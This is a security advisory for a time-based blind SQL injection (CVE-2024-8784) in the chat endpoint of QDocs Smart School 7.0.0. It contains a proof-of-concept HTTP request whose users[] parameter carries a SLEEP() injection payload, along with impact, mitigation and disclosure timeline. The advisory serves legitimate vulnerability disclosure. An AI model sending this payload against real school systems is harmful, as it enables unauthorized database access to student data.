Skip to content

Latest commit

 

History

History
84 lines (61 loc) · 3.54 KB

Advisory for Time-Based Blind SQL Injection in QDocs Smart School.md

File metadata and controls

84 lines (61 loc) · 3.54 KB
Raw

Security Advisory: Time-Based Blind SQL Injection in QDocs Smart School Management System

CVE: CVE-2024-8784

Date: 12 Sep, 2024

Severity: Critical

Affected Product:

  • Product: QDocs Smart School Management System
  • Affected Version: Version 7.0.0 (and possibly earlier versions)

Vulnerability Type:

  • Blind SQL Injection (Time-Based)

Discovered By:

  • Jobyer Ahmed

Description:

A time-based blind SQL injection vulnerability has been discovered in the QDocs Smart School Management System, specifically in the chat system. The vulnerability exists in the users[] parameter of the /user/chat/mynewuser endpoint. This allows an authenticated attacker, with student privileges, to inject malicious SQL queries that can delay the server’s response using the SLEEP() function, thereby confirming the presence of an injection vulnerability without directly revealing data.

This kind of attack can be leveraged to infer sensitive information or cause unauthorized actions within the database, which could compromise the integrity and confidentiality of the system.

Impact:

The time-based blind SQL injection allows an attacker to:

  • Execute Arbitrary SQL Commands: Attackers can run SQL queries on the database, which could lead to unauthorized data access or manipulation.
  • Infer Sensitive Information: Through timing-based attacks, an attacker can deduce the existence of data or database structure without directly viewing it.
  • Compromise Data Integrity: SQL injection could allow unauthorized changes to critical data, such as user accounts or records.

Attack Vector:

The attacker must be authenticated as a student user to exploit this vulnerability. By injecting SQL code into the users[] parameter, the attacker can craft requests that cause deliberate delays in the server's response using SQL’s SLEEP() function.

Proof of Concept (PoC):

POST /user/chat/mynewuser HTTP/1.1
Host: [placeholder-host]
Cookie: ci_session=93mpnv1mlhiivbkbd83c6kfd36bcjaft
Content-Length: 79
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126"
Accept-Language: en-US
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Linux"
Origin: https://[placeholder-host]
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://[placeholder-host]/webtest/user/chat
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

users%5B%5D=1'+AND+(SELECT+3220+FROM+(SELECT(SLEEP(5)))ZNun)+AND+'WwBM'%3d'WwBM

In this PoC, the injected SQL query uses the SLEEP() function to delay the server response by 5 seconds if the SQL injection is successful, confirming the vulnerability through timing differences.

Mitigation:

It is strongly recommended that users of the QDocs Smart School Management System:

Update to the latest version of the software as soon as the patch is available. Ensure that all user inputs are properly sanitized and that parameterized queries are used throughout the application to prevent SQL injection attacks.

Timeline:

  • Initial Discovery: 8th, March, 2024
  • Vendor Notification: 8th, March, 2024
  • Vendor Response: 8th, March, 2024
  • Patch Availability: 18 Jul, 2024
  • Public Disclosure: 12, Sep, 2024

Acknowledgments:

The vulnerability was discovered by Jobyer Ahmed.